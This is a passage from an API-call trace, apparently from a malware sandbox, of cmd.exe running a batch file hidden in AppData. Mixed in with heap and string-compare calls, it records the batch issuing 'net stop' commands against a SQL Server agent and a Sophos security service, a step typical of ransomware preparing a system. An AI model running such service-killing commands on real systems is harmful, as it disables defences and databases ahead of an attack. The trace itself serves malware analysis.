(_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0036.863] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0036.863] GetProcessHeap () returned 0x3e0000 [0036.863] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4040 | out: hHeap=0x3e0000) returned 1 [0036.863] GetProcessHeap () returned 0x3e0000 [0036.863] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a70 [0036.863] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.863] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$SYSTEM_BGC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$SYSTEM_BGC /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$SYSTEM_BGC /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xb34, dwThreadId=0xb38)) returned 1 [0036.875] CloseHandle (hObject=0x74) returned 1 [0036.875] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.875] GetProcessHeap () returned 0x3e0000 [0036.875] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.875] GetEnvironmentStringsW () returned 0x3f8408* [0036.875] GetProcessHeap () returned 0x3e0000 [0036.875] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.875] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.875] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0037.368] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0037.368] CloseHandle (hObject=0x78) returned 1 [0037.368] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0037.368] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0037.368] GetProcessHeap () returned 0x3e0000 [0037.368] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.368] GetEnvironmentStringsW () returned 0x3f8408* [0037.368] GetProcessHeap () returned 0x3e0000 [0037.368] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.368] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.368] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0037.368] GetProcessHeap () returned 0x3e0000 [0037.368] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.368] GetEnvironmentStringsW () returned 0x3f8408* [0037.368] GetProcessHeap () returned 0x3e0000 [0037.368] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.368] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.368] GetProcessHeap () returned 0x3e0000 [0037.368] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0037.369] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0037.369] _get_osfhandle (_FileHandle=1) returned 0x264 [0037.369] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0037.369] _get_osfhandle (_FileHandle=1) returned 0x264 [0037.369] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0037.369] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0037.369] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0037.369] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0037.369] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0037.369] SetConsoleInputExeNameW () returned 0x1 [0037.369] GetConsoleOutputCP () returned 0x1b5 [0037.370] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0037.370] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.370] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0037.370] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0037.370] _get_osfhandle (_FileHandle=3) returned 0x78 [0037.370] SetFilePointer (in: hFile=0x78, lDistanceToMove=939, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ab [0037.370] GetProcessHeap () returned 0x3e0000 [0037.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7488 | out: hHeap=0x3e0000) returned 1 [0037.370] GetProcessHeap () returned 0x3e0000 [0037.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7358 | out: hHeap=0x3e0000) returned 1 [0037.370] GetProcessHeap () returned 0x3e0000 [0037.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7230 | out: hHeap=0x3e0000) returned 1 [0037.370] GetProcessHeap () returned 0x3e0000 [0037.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f71c8 | out: hHeap=0x3e0000) returned 1 [0037.370] GetProcessHeap () returned 0x3e0000 [0037.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0037.370] GetProcessHeap () returned 0x3e0000 [0037.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb0 | out: hHeap=0x3e0000) returned 1 [0037.370] GetProcessHeap () returned 0x3e0000 [0037.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0037.370] GetProcessHeap () returned 0x3e0000 [0037.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e80 | out: hHeap=0x3e0000) returned 1 [0037.370] GetProcessHeap () returned 0x3e0000 [0037.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0037.370] GetProcessHeap () returned 0x3e0000 [0037.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0037.370] GetProcessHeap () returned 0x3e0000 [0037.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0037.370] GetProcessHeap () returned 0x3e0000 [0037.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0037.370] GetProcessHeap () returned 0x3e0000 [0037.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0037.371] _get_osfhandle (_FileHandle=3) returned 0x78 [0037.371] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ab [0037.371] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1516, lpOverlapped=0x0) returned 1 [0037.371] SetFilePointer (in: hFile=0x78, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0037.371] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=49, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Sophos Device Control ServiceΓÇ¥ /y\r\nfailures\r\nnded\r\n") returned 49 [0037.371] _get_osfhandle (_FileHandle=3) returned 0x78 [0037.371] GetFileType (hFile=0x78) returned 0x1 [0037.371] _get_osfhandle (_FileHandle=3) returned 0x78 [0037.371] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0037.371] GetProcessHeap () returned 0x3e0000 [0037.371] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fbad8 [0037.371] GetProcessHeap () returned 0x3e0000 [0037.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbad8 | out: hHeap=0x3e0000) returned 1 [0037.371] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3f90 [0037.371] GetProcessHeap () returned 0x3e0000 [0037.371] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x10) returned 0x3f6a58 [0037.371] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x62) returned 0x3f3ff0 [0037.372] _tell (_FileHandle=3) returned 988 [0037.372] _close (_FileHandle=3) returned 0 [0037.372] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0037.372] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0037.372] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0037.372] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0037.372] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0037.372] _wcsicmp (_String1="net", _String2="CD") returned 11 [0037.372] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0037.372] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0037.372] _wcsicmp (_String1="net", _String2="REN") returned -4 [0037.372] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0037.372] _wcsicmp (_String1="net", _String2="SET") returned -5 [0037.372] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0037.372] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0037.372] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0037.372] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0037.372] _wcsicmp (_String1="net", _String2="MD") returned 1 [0037.372] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0037.372] _wcsicmp (_String1="net", _String2="RD") returned -4 [0037.372] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0037.372] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0037.372] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0037.372] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0037.372] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0037.372] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0037.372] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0037.372] _wcsicmp (_String1="net", _String2="VER") returned -8 [0037.372] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0037.373] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0037.373] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0037.373] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0037.373] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0037.373] _wcsicmp (_String1="net", _String2="START") returned -5 [0037.373] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0037.373] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0037.373] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0037.373] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0037.373] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0037.373] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0037.373] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0037.373] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0037.373] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0037.373] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0037.373] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0037.373] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0037.373] SetErrorMode (uMode=0x0) returned 0x1 [0037.373] GetProcessHeap () returned 0x3e0000 [0037.373] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0037.373] GetProcessHeap () returned 0x3e0000 [0037.373] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0037.373] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.373] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.373] GetProcessHeap () returned 0x3e0000 [0037.373] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d58 [0037.373] GetProcessHeap () returned 0x3e0000 [0037.373] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e80 [0037.373] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e80, Size=0x122) returned 0x3f6e80 [0037.373] GetProcessHeap () returned 0x3e0000 [0037.373] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e80) returned 0x122 [0037.373] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.373] GetProcessHeap () returned 0x3e0000 [0037.373] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0037.374] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0037.374] GetProcessHeap () returned 0x3e0000 [0037.374] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0037.374] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.374] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.374] GetLastError () returned 0x2 [0037.374] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.374] GetLastError () returned 0x2 [0037.374] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.374] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0037.374] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0037.374] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.374] GetLastError () returned 0x2 [0037.374] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0037.375] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0037.375] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0037.375] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0037.375] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.375] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f6fb0 [0037.375] GetProcessHeap () returned 0x3e0000 [0037.375] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x6a) returned 0x3f71c8 [0037.375] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f7240 [0037.375] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f7248, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0037.375] SetErrorMode (uMode=0x0) returned 0x1 [0037.375] GetProcessHeap () returned 0x3e0000 [0037.375] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7240, Size=0x5c) returned 0x3f7240 [0037.375] GetProcessHeap () returned 0x3e0000 [0037.375] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7240) returned 0x5c [0037.375] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.375] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.375] GetProcessHeap () returned 0x3e0000 [0037.375] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f72a8 [0037.375] GetProcessHeap () returned 0x3e0000 [0037.375] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f73d0 [0037.375] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f73d0, Size=0x122) returned 0x3f73d0 [0037.375] GetProcessHeap () returned 0x3e0000 [0037.375] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f73d0) returned 0x122 [0037.375] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.375] GetProcessHeap () returned 0x3e0000 [0037.375] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7500 [0037.375] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7500, Size=0x76) returned 0x3f7500 [0037.376] GetProcessHeap () returned 0x3e0000 [0037.376] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7500) returned 0x76 [0037.376] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.376] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.376] GetLastError () returned 0x2 [0037.376] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.376] GetLastError () returned 0x2 [0037.376] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.376] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0037.376] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0037.376] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.376] GetLastError () returned 0x2 [0037.376] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0037.376] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0037.377] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0037.377] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0037.377] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.377] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0037.377] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0037.377] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0037.377] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3ef4b0 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.377] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.378] _wcsnicmp (_String1="COPYCMD", 